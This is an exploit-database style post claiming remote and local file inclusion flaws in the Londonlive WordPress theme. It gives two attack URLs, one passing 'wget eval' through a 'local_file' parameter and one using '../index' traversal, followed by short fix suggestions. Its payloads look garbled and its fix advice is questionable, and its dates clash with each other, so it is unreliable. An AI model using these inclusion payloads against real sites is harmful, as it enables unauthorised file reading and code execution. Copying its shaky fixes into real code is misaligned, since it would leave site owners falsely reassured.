facebook facebook twitter rss

Wordpress themes (Londonlive)====> RFI & LFI

Author: ACe , Published: 19-05-2012
# Exploit Title: Wordpress themes (Londonlive)====> RFI & LFI 
# Google Dork: you do it :P
# Date: 2012/5/31
# Author: ACe
# Version: v1.2
# Tested on: win 7
# email:PGDA@9.cn
# greetings to : pSyCh0_3D , Fontom



#RFI exploit#

http://localhost/wp-content/themes/Londonlive/functions.php?local_file= wget eval





#LFI exploit#


http://localhost/wp-content/themes/Londonlive/scripts/functions/admin_panel_functions.php?page.=../index





#how to fix LFI exploit #

search for ($page.) and replace with ('../../..';) in /scripts/functions/admin_panel_functions.php then save.


#how to fix RFI exploit #

go to /themes/Londonlive/ and open functions.php and define the variable ($local_file) like this


$local_file="./";





#thinks god for makeing me stronger :)

Like us on Facebook :